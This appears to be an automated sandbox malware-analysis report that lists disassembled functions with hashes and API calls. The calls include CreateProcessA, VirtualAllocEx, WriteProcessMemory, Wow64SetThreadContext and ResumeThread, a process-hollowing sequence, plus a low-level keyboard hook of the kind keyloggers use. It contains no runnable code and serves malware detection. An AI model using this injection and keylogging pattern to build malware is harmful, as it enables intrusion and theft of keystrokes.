                                                                                • Instruction ID: ab764fedadfab920e42b6c58f5f0287407d957848fdf496bc311a73091aa46d3
                                                                                • Opcode Fuzzy Hash: 57ddd90417a5cd00655c6c484df872b4e727f635504ca8765a700a74b01e2ecc
                                                                                • Instruction Fuzzy Hash: FD51BD74D02228CFDB65DF68D985BECBBB1AB4A315F1180EAD509A7251CB305EC5CF81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0033BE6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 4f8f21a4361074ac97ff738e03a0084b9e50b8954d5eb2484f46b7253d4f30fb
                                                                                • Instruction ID: cff74fcb65d4a56162ce0b14495667e661d3204fe4e87e4143bf635047bd7740
                                                                                • Opcode Fuzzy Hash: 4f8f21a4361074ac97ff738e03a0084b9e50b8954d5eb2484f46b7253d4f30fb
                                                                                • Instruction Fuzzy Hash: 70A11270D002698FCF21CFA4C881BEDBBB6BF05308F1095A9E959B7250DB749A85CF95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033B8E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: aa7717b61cfd9bd277501e6e55ca7808b91d11fd04ae12518c6e5d45d0534e1d
                                                                                • Instruction ID: 5c2e8d873256d1e9f3819ddafbad760839bf60aba74d0ef58b1ac598f3bdef03
                                                                                • Opcode Fuzzy Hash: aa7717b61cfd9bd277501e6e55ca7808b91d11fd04ae12518c6e5d45d0534e1d
                                                                                • Instruction Fuzzy Hash: 394198B4D012489FCF00CFA9D984AEEFBF1BB49314F24942AE915BB210D734AA55CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033B8E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 5b31348b608b3ae5beed1b083dc3ae18db7af01c06d641a9c27d8f9fca858548
                                                                                • Instruction ID: 1c15441665c95835beb394c8a63f422faafd1181eff1890af2b3658f9bb5b340
                                                                                • Opcode Fuzzy Hash: 5b31348b608b3ae5beed1b083dc3ae18db7af01c06d641a9c27d8f9fca858548
                                                                                • Instruction Fuzzy Hash: BB41ABB4D012489FCF00CFA9D984AEEFBF5BB49314F20942AE914BB200D734AA45CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033BA22
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 2da48f3b8548257e1c190bf25ab480b6d165a1849d6be96f12579729b236388d
                                                                                • Instruction ID: f34b08f85d11984662bf6e0b602c06c807e69a9b055ffbc5fcde120d32f7ad0e
                                                                                • Opcode Fuzzy Hash: 2da48f3b8548257e1c190bf25ab480b6d165a1849d6be96f12579729b236388d
                                                                                • Instruction Fuzzy Hash: E341B9B8D00258DFCF00CFA9D884AEEFBB1BB49314F14942AE915BB200D734A945CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033BA22
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 4cd925bddfb00c82bded4325b837518950f5a2782eb960bedc746a1e1ec1faac
                                                                                • Instruction ID: 1275743a15ff93844a3544ab251ce7933476882752844a46087ba9e2b995d4f7
                                                                                • Opcode Fuzzy Hash: 4cd925bddfb00c82bded4325b837518950f5a2782eb960bedc746a1e1ec1faac
                                                                                • Instruction Fuzzy Hash: 0E4198B8D002589FCF10CFE9D884AEEFBB5BB49314F10942AE915B7200D735A955CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0033B792
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 368af98d91d233e938f11e6737213c82ead9d8f0651262db37ed8e47d2bb6e0d
                                                                                • Instruction ID: a48ba828ce366a61d89b628192a519b68f09fd7a067748275a57b276890200c8
                                                                                • Opcode Fuzzy Hash: 368af98d91d233e938f11e6737213c82ead9d8f0651262db37ed8e47d2bb6e0d
                                                                                • Instruction Fuzzy Hash: 3D4198B8D002489FCF10CFA9D880ADEFBB1EF4A314F24942AE915BB250D735A906CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0033B792
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 143675f3734dde0a0e2e3a30106b514131cdd8ae62f35c9ab53ba0cce43c689a
                                                                                • Instruction ID: 03409e313e3b48f51bec189f9ed18f19c867e75fc004047b9e079d561d4dab34
                                                                                • Opcode Fuzzy Hash: 143675f3734dde0a0e2e3a30106b514131cdd8ae62f35c9ab53ba0cce43c689a
                                                                                • Instruction Fuzzy Hash: 194168B8D002589BCF10CFA9D884ADEFBB5EF49314F20942AE915BB210D735A916CF95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0033B667
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 1653b83e69289c61a2359610a6fdf49e936fbe2a1d95e611320c981d19a6f481
                                                                                • Instruction ID: 0b284a7dab411c6260a872be59512f90ee4b05286ab57224d805508345e8e027
                                                                                • Opcode Fuzzy Hash: 1653b83e69289c61a2359610a6fdf49e936fbe2a1d95e611320c981d19a6f481
                                                                                • Instruction Fuzzy Hash: 4541BCB5D002589FCB10CFA9D885AEEFBF1BB49314F24942AE414B7240D778A945CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0033B667
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 5917647028d3b3960b8a18a69bb49565033c68c48b0fac50a58bf3e0852f9e01
                                                                                • Instruction ID: e144f8cbf74fea0f6477e794bee11252e3c63916ef706b237b86eeaecbc37f16
                                                                                • Opcode Fuzzy Hash: 5917647028d3b3960b8a18a69bb49565033c68c48b0fac50a58bf3e0852f9e01
                                                                                • Instruction Fuzzy Hash: 4C41AAB4D002589FCB14CFA9D885AEEFBF5BB49314F24842AE819B7240D738A945CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0033B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 03f166c5305d6a9445cdab53d0a4be0a493baeb990b402e9de9c3edc806a040d
                                                                                • Instruction ID: 7f96e28e0fb6c5c50bde9a514f0609db288f8703ecd804ef67e7dda4e1f71b1a
                                                                                • Opcode Fuzzy Hash: 03f166c5305d6a9445cdab53d0a4be0a493baeb990b402e9de9c3edc806a040d
                                                                                • Instruction Fuzzy Hash: CA31AAB4D012589FCF14CFA9D884ADEFBB5EB4A314F24982AE915B7300D735A902CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0033B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 95fc34a2710936b61a12a4cdf39ed0dd32e15ec210f24f1cd5437429d88da7d6
                                                                                • Instruction ID: d67ff8841676908345d89b46b89daa1dc02b0d2c3c33df9812b5a8b285f8a480
                                                                                • Opcode Fuzzy Hash: 95fc34a2710936b61a12a4cdf39ed0dd32e15ec210f24f1cd5437429d88da7d6
                                                                                • Instruction Fuzzy Hash: 273199B4D012189FCF14CFA9D884ADEFBB5EB49314F24982AE915B7300D735A901CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139351733.00000000001DD000.00000040.00000001.sdmp, Offset: 001DD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d222e3352a2fb703b87f8efa4c6ff13eeee6ec9e85cf71d30bc1732082e64b85
                                                                                • Instruction ID: 5e779430b10a73ff85e40bf59800bc71a75ab424229de29c742a47e34eb66ebf
                                                                                • Opcode Fuzzy Hash: d222e3352a2fb703b87f8efa4c6ff13eeee6ec9e85cf71d30bc1732082e64b85
                                                                                • Instruction Fuzzy Hash: CC21D475604244DFDB14DF64E984B16BBA5FBC8314F34C9AAE8094B346C336D847CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139351733.00000000001DD000.00000040.00000001.sdmp, Offset: 001DD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 683bea0e3bd69910bfa500636086421dc6727d7a9fec64a982b2e006e09bbfeb
                                                                                • Instruction ID: 894c9ff5a4c4ba7780d2ba50acd76634fa3c2209b833ee6e2ed6ffb52f3912df
                                                                                • Opcode Fuzzy Hash: 683bea0e3bd69910bfa500636086421dc6727d7a9fec64a982b2e006e09bbfeb
                                                                                • Instruction Fuzzy Hash: 69216F755093808FCB12CF24D994B15BF71EB86314F28C5EBD8498B697C33AD80ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139340316.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1211a255df6eb97692d0247311a5344e32e2f007581510e34e7194957aca3ee8
                                                                                • Instruction ID: b835f52af65c37dd2cb03fd2326210bd1b6ec67d4667a290f45e382cc588bade
                                                                                • Opcode Fuzzy Hash: 1211a255df6eb97692d0247311a5344e32e2f007581510e34e7194957aca3ee8
                                                                                • Instruction Fuzzy Hash: 4301A7310043449BD7244F65E988F67BBDCEF61724F18C47EE9485A282C774EC40C6B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139340316.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f0cf16259137e350faac6ba2fdfe3d2762ea8abd1e2ad808807226ab9d1b54f0
                                                                                • Instruction ID: 4b39bad2fdb65ba21f5e4b78339853c4f7fe80b9993404f2303b5b481961c94a
                                                                                • Opcode Fuzzy Hash: f0cf16259137e350faac6ba2fdfe3d2762ea8abd1e2ad808807226ab9d1b54f0
                                                                                • Instruction Fuzzy Hash: A1F04F71404244ABE7108E55E888B62FFD8EF91734F28C56AED485E286C378E844CAA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @2Em
                                                                                • API String ID: 0-598872186
                                                                                • Opcode ID: 0d94372a36e8986f4ebc1a5fb462b4f79d243cefb64a1bc2ca5852b1ff652646
                                                                                • Instruction ID: 8e57e8ecd00193360b1c23dae41e9cb08173af270eeaaa0997d206384b76e6b4
                                                                                • Opcode Fuzzy Hash: 0d94372a36e8986f4ebc1a5fb462b4f79d243cefb64a1bc2ca5852b1ff652646
                                                                                • Instruction Fuzzy Hash: 0B517B74906208CFDB44EFB9D980AADBFF7EBC8304F00C93AD015AB665DB7099458B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @2Em
                                                                                • API String ID: 0-598872186
                                                                                • Opcode ID: bbb8be5f066a0d4d1df0d2b1d3ab9b6cd49250dc0a19465a3934d22329f878f5
                                                                                • Instruction ID: 76d394513d049978594776dc6e6cae0ce18cc31ba355b519a04084f836fd4751
                                                                                • Opcode Fuzzy Hash: bbb8be5f066a0d4d1df0d2b1d3ab9b6cd49250dc0a19465a3934d22329f878f5
                                                                                • Instruction Fuzzy Hash: 58512A749062098FDB44EFB9D980AADBFF7EBC8304F00C93AD015AB664DB7099458B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6ff8fc477d6f9737bd544e01f0da9c92852bcf87498e80a876f6d08f3d6d7bab
                                                                                • Instruction ID: 0cd553c7517c07eeda80f0ee4c59383deaf47306c865b2976144a804c5f30fe2
                                                                                • Opcode Fuzzy Hash: 6ff8fc477d6f9737bd544e01f0da9c92852bcf87498e80a876f6d08f3d6d7bab
                                                                                • Instruction Fuzzy Hash: 3D412AB1E056188BEB5CCF6B8D4068DFAF7BFC9300F54D1BA950DA6215DB7005868F14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9271643471dcfa06dbe32740cedf2c6408bdfdb049b852d59046abc85fd22d91
                                                                                • Instruction ID: d2638b14543ee67503b0305f737d44034d7bfbe9bcee922204c9bf0b76d9c013
                                                                                • Opcode Fuzzy Hash: 9271643471dcfa06dbe32740cedf2c6408bdfdb049b852d59046abc85fd22d91
                                                                                • Instruction Fuzzy Hash: AB118E31D05228CFDB19CFB5C5987EEBBF1AB0A305F249069D451B72A0C7798948DB74
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b2f65f9db537d78dade519c96ae50d98ca3d3f44ac19202c4dbb0c2dce32de76
                                                                                • Instruction ID: 2f4ed56879415d681be08e69116fa39c05c23ee3ca8bfc95524de577a76b16de
                                                                                • Opcode Fuzzy Hash: b2f65f9db537d78dade519c96ae50d98ca3d3f44ac19202c4dbb0c2dce32de76
                                                                                • Instruction Fuzzy Hash: 3E113C30D05258CBDB19CFA6C4987EDBBF5AB4A301F149069D455B3290CBB88984DB78
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cba81545382d93334823fd8f5a8f1e2a65c372e199d2c2093df5539467c88159
                                                                                • Instruction ID: 9a9f91beba5117e30c2fb95e13a04bb8b27efa6776ec930007f77e0aba9edddd
                                                                                • Opcode Fuzzy Hash: cba81545382d93334823fd8f5a8f1e2a65c372e199d2c2093df5539467c88159
                                                                                • Instruction Fuzzy Hash: 7B115A30D042188BDB158FA5D8887EDBAF5AF4A301F14946AE452B3290C7784984DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 00A4FAFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: 2768bad1a179c61feeaee0e07911325345934d511ca89fc740736282a00736b4
                                                                                • Instruction ID: 2e21270b8bf26402958da23e398400d26e9ceec8481e546fa32fa36743b6909f
                                                                                • Opcode Fuzzy Hash: 2768bad1a179c61feeaee0e07911325345934d511ca89fc740736282a00736b4
                                                                                • Instruction Fuzzy Hash: 742113759002089FCB10CF99D844BEEFBF9FB88310F24882AE459A7350C7B4A941CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 79eaa60302b31c83288031a8719bbfcaea944cf8c4d21822dbb8d474a2060000
                                                                                • Instruction ID: 5a138f36214330c9aa658bb08b843cab91698725ff2de944a6aa0fd5e1b6412e
                                                                                • Opcode Fuzzy Hash: 79eaa60302b31c83288031a8719bbfcaea944cf8c4d21822dbb8d474a2060000
                                                                                • Instruction Fuzzy Hash: F0623874A04219CFCB65EF24C85879CB7BABF88305F20C5EAD50AA7255DB349E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: fc0cd9a794cedc77d6f4829570eb75b80738b76ce7868b141b1fb94bbf6e5dcd
                                                                                • Instruction ID: 971bb118bd952c1e72d7eae352095e6ed350dc1767b4533c1dac43e60657ae4c
                                                                                • Opcode Fuzzy Hash: fc0cd9a794cedc77d6f4829570eb75b80738b76ce7868b141b1fb94bbf6e5dcd
                                                                                • Instruction Fuzzy Hash: 87422674A04219CFCB25DF74C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 911ccafd01618ef5ff3ef07d52385532d10e0690a62101756cdce7573b237ec4
                                                                                • Instruction ID: e21b4f05a4d735a341d1be1d11416030b268b567c065718ee196a3542800ad83
                                                                                • Opcode Fuzzy Hash: 911ccafd01618ef5ff3ef07d52385532d10e0690a62101756cdce7573b237ec4
                                                                                • Instruction Fuzzy Hash: 50422774A04219CFCB25DF64C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: ebf3c61a1bcbd964a3172dca5f2e2c9b5ce507d7566b47b29d1481883f3c7e92
                                                                                • Instruction ID: 9ee19a4806654a9fb81c769301c6e76b88f4fa4d51cd69f7adb13d7e5917c029
                                                                                • Opcode Fuzzy Hash: ebf3c61a1bcbd964a3172dca5f2e2c9b5ce507d7566b47b29d1481883f3c7e92
                                                                                • Instruction Fuzzy Hash: 24422674A04219CFCB25DF64C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: edc023c127f7a95403a7b0a7bfd7162d2c65fff7e1dd03699c934e93f6aca610
                                                                                • Instruction ID: b743e6a56b041f0388728b58bd7f3921b605cb6fae1001dcfe778cf5a0cab4e1
                                                                                • Opcode Fuzzy Hash: edc023c127f7a95403a7b0a7bfd7162d2c65fff7e1dd03699c934e93f6aca610
                                                                                • Instruction Fuzzy Hash: 3A422674A04219CFCB25DF74C85879CB7BABF88305F2085E9D50AA7255DB389E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: e8e77cb4cd41830b80c1851cb853f1d53ccfdc805bbf05ee84fa8d4ce4d5e23e
                                                                                • Instruction ID: 79948b847856f85740c1b759e28b7313a95ed4fa2c907c385a1fbbdb84f39201
                                                                                • Opcode Fuzzy Hash: e8e77cb4cd41830b80c1851cb853f1d53ccfdc805bbf05ee84fa8d4ce4d5e23e
                                                                                • Instruction Fuzzy Hash: A3423674A04219CFCB25EF74C85879CB7BABF88305F2085E9D50AA7255DB389E82CF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 29361b312024d1830c2a3692f1cc2ff8b5ec720804dbd311eb557c43f607e397
                                                                                • Instruction ID: 7dce0e7bb5e4305ef2f6e78e1b5c5abc039cbf69e47b5045aabc65eb8d7a1bb3
                                                                                • Opcode Fuzzy Hash: 29361b312024d1830c2a3692f1cc2ff8b5ec720804dbd311eb557c43f607e397
                                                                                • Instruction Fuzzy Hash: 02020674A04215CFCB66DB24C94479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 4b24700cbc186546d8081b36de0c3e51480cb587c65810b12ba222eda2104d1c
                                                                                • Instruction ID: e353cc229194388ad89e17f3b6329aed58231cfc30dee0ebab546719dce7ce4a
                                                                                • Opcode Fuzzy Hash: 4b24700cbc186546d8081b36de0c3e51480cb587c65810b12ba222eda2104d1c
                                                                                • Instruction Fuzzy Hash: 02021674A04215CFCB66DB24C84479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: d82fe079531a6962b8426bcd0203e8686b93e33b240f500a5812f76eb890fb5f
                                                                                • Instruction ID: 503930a53aa29ef0a1ec89a1847b5f94ab41292e417019e5cc9139fefce16b89
                                                                                • Opcode Fuzzy Hash: d82fe079531a6962b8426bcd0203e8686b93e33b240f500a5812f76eb890fb5f
                                                                                • Instruction Fuzzy Hash: E4021674A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: af42c6df6e795b9fb6328ba3f19bcdee832f6fb3aefafd7da478dd32a0c134d2
                                                                                • Instruction ID: c8d6b887e40a19e5e86fc2630f311783a57e1c103c76e6f34adbde276092d9b2
                                                                                • Opcode Fuzzy Hash: af42c6df6e795b9fb6328ba3f19bcdee832f6fb3aefafd7da478dd32a0c134d2
                                                                                • Instruction Fuzzy Hash: 57021774A04215CFCB26DB24C95479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: d608ae24a61446c8128803007ca0a2446e365ad6b9740cbde6fe4bbd677b7e28
                                                                                • Instruction ID: 7b1b45d4104f4cda2cfd639b349c5c4a70488fce97201658d4b940f1ff4fb938
                                                                                • Opcode Fuzzy Hash: d608ae24a61446c8128803007ca0a2446e365ad6b9740cbde6fe4bbd677b7e28
                                                                                • Instruction Fuzzy Hash: E9021874A04215CFCB66DB24C85479CB7BABF88305F20C4EAD509A7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
